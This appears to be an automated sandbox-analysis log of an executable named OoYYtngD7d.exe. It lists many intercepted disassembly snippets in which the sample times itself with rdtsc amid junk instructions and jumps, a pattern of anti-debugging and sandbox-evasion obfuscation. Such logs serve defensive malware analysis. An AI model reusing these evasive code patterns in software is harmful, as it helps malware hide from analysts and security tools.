Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D6A3F8 second address: D6A400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D6A400 second address: D6A41F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D6A41F second address: D6A429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDD79156826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D715C8 second address: D715D2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDD78DE46B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D715D2 second address: D715D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D71E84 second address: D71E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDD78DE46A6h 0x0000000a jnp 00007FDD78DE46A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D72417 second address: D72425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D72425 second address: D7242F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDD78DE46A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D7242F second address: D72435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D72435 second address: D7243B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D7243B second address: D7243F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D7243F second address: D7244D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FDD78DE46A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D733AA second address: D733B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD7915682Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D7A112 second address: D7A132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f ja 00007FDD78DE46A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D7A132 second address: D7A14F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156831h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D7A14F second address: D7A162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD78DE46ADh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D7A162 second address: D7A166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D79ACD second address: D79AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B9h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D79AEB second address: D79B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDD7915682Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D79B08 second address: D79B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD78DE46AEh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDD78DE46B1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D79B30 second address: D79B58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FDD7915682Dh 0x0000000e jmp 00007FDD7915682Ah 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D79B58 second address: D79B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D79CFD second address: D79D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D79D03 second address: D79D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D79E60 second address: D79E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDD79156826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D79E6A second address: D79E7C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDD78DE46A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jp 00007FDD78DE46A6h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D79E7C second address: D79E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D864C6 second address: D864F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B4h 0x00000007 jmp 00007FDD78DE46ABh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FDD78DE46A6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D864F1 second address: D86510 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FDD79156826h 0x0000000e jmp 00007FDD79156831h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D86510 second address: D86514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D89032 second address: D89046 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD7915682Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D89046 second address: D8904C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D88BA4 second address: D88BBD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007FDD79156826h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D88BBD second address: D88BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CB44A3 second address: CB44DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FDD79156841h 0x0000000f jmp 00007FDD79156835h 0x00000014 js 00007FDD79156826h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D98DC2 second address: D98DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FDD78DE46A6h 0x0000000a jmp 00007FDD78DE46ACh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DA2551 second address: DA2555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DA2555 second address: DA256F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDD78DE46B3h 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DA2985 second address: DA298B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DA2AC9 second address: DA2ACF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DA5E16 second address: DA5E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DA5E1A second address: DA5E24 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDD78DE46A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DA8891 second address: DA8897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DE5DD4 second address: DE5DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DE5DD8 second address: DE5E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDD79156837h 0x0000000d jc 00007FDD7915683Fh 0x00000013 pushad 0x00000014 jne 00007FDD79156826h 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DE5E23 second address: DE5E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DEBA59 second address: DEBA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DEBA5D second address: DEBA61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DEBA61 second address: DEBA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDD79156834h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DEBA7B second address: DEBA88 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDD78DE46A8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DEBA88 second address: DEBA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DFAAD7 second address: DFAADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: DFAC8D second address: DFACAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD79156839h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: EC6E9B second address: EC6EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: EC6CE7 second address: EC6D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD79156838h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECB738 second address: ECB754 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDD78DE46B6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECB754 second address: ECB75F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECB75F second address: ECB774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FDD78DE46A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECB774 second address: ECB791 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDD79156837h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECA77E second address: ECA784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECA784 second address: ECA793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnp 00007FDD79156826h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECA92D second address: ECA94D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECA94D second address: ECA953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECA953 second address: ECA95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECB039 second address: ECB04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD7915682Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECB2E2 second address: ECB305 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDD78DE46A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 jmp 00007FDD78DE46B1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECB45B second address: ECB48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDD79156826h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FDD79156831h 0x00000016 jbe 00007FDD79156826h 0x0000001c je 00007FDD79156826h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECCE10 second address: ECCE1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FDD78DE46A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECCE1B second address: ECCE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECCE21 second address: ECCE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jbe 00007FDD78DE46A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECCE32 second address: ECCE36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECCE36 second address: ECCE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FDD78DE46BFh 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007FDD78DE46B7h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECCE63 second address: ECCE6D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDD79156826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ECCE6D second address: ECCE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ED1152 second address: ED1157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ED1157 second address: ED1192 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDD78DE46A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FDD78DE46B9h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDD78DE46B2h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ED1192 second address: ED1196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: ED1266 second address: ED1296 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDD78DE46A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c xor dh, 00000030h 0x0000000f push 00000004h 0x00000011 mov edx, edi 0x00000013 call 00007FDD78DE46A9h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDD78DE46B2h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E000B second address: 71E0011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0011 second address: 71E0015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0015 second address: 71E0065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FDD79156838h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FDD79156830h 0x00000016 mov ebp, esp 0x00000018 jmp 00007FDD79156830h 0x0000001d mov eax, dword ptr fs:[00000030h] 0x00000023 pushad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0065 second address: 71E00DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDD78DE46AAh 0x0000000a or eax, 1F7D2088h 0x00000010 jmp 00007FDD78DE46ABh 0x00000015 popfd 0x00000016 popad 0x00000017 mov cx, F0FFh 0x0000001b popad 0x0000001c sub esp, 18h 0x0000001f pushad 0x00000020 push ecx 0x00000021 pushfd 0x00000022 jmp 00007FDD78DE46B7h 0x00000027 or ch, 0000007Eh 0x0000002a jmp 00007FDD78DE46B9h 0x0000002f popfd 0x00000030 pop ecx 0x00000031 mov ebx, 71D7BDF4h 0x00000036 popad 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FDD78DE46AFh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E00DF second address: 71E0169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b pushad 0x0000000c mov ax, F8F9h 0x00000010 mov dx, ax 0x00000013 popad 0x00000014 mov ebx, dword ptr [eax+10h] 0x00000017 pushad 0x00000018 movzx esi, di 0x0000001b push edx 0x0000001c mov ecx, 76B66C25h 0x00000021 pop ecx 0x00000022 popad 0x00000023 push ebx 0x00000024 jmp 00007FDD7915682Eh 0x00000029 mov dword ptr [esp], esi 0x0000002c pushad 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 mov eax, 02BAF949h 0x00000035 popad 0x00000036 jmp 00007FDD79156836h 0x0000003b popad 0x0000003c mov esi, dword ptr [762C06ECh] 0x00000042 jmp 00007FDD79156830h 0x00000047 test esi, esi 0x00000049 jmp 00007FDD79156830h 0x0000004e jne 00007FDD79157708h 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0169 second address: 71E016F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E016F second address: 71E01D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FDD79156830h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007FDD79156837h 0x00000019 adc si, A7CEh 0x0000001e jmp 00007FDD79156839h 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E01D3 second address: 71E0207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 1Ch 0x00000006 popad 0x00000007 xchg eax, edi 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FDD78DE46B4h 0x0000000f sub esi, 123DF378h 0x00000015 jmp 00007FDD78DE46ABh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: 71E0207 second address: 71E022C instructions: 0x00000000 rdtsc 0x00000002 mov esi, 57FE89C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a call dword ptr [76290B60h] 0x00000010 mov eax, 75A0E5E0h 0x00000015 ret 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDD79156833h 0x0000001d rdtsc
